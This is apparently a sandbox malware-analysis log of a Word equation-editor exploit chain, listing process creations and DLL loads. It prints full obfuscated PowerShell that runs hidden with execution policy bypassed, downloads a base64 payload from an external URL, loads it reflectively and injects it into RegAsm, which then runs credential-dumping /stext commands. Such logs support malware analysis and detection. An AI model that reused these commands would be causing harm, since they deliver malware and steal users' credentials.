V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xngebzmuliqlvokkyghpdzaillbyo"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ahlxcrfozqiqgugoprcrgenrualhhmmku"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\muezvmgbhtns"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wjfueylyjgoymkoaaythvh"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS"
                  Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xngebzmuliqlvokkyghpdzaillbyo"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ahlxcrfozqiqgugoprcrgenrualhhmmku"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\muezvmgbhtns"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wjfueylyjgoymkoaaythvh"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64win.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64cpu.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: cryptsp.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: version.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: secur32.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winhttp.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: webio.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: iphlpapi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winnsi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dnsapi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: nlaapi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc6.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rasadhlp.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: propsys.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: ntmarta.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dwmapi.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: webio.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: credssp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: shcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rstrtmgr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: bcrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: nlaapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windowscodecs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: pstorec.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ucrtbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64win.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64cpu.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: cryptsp.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
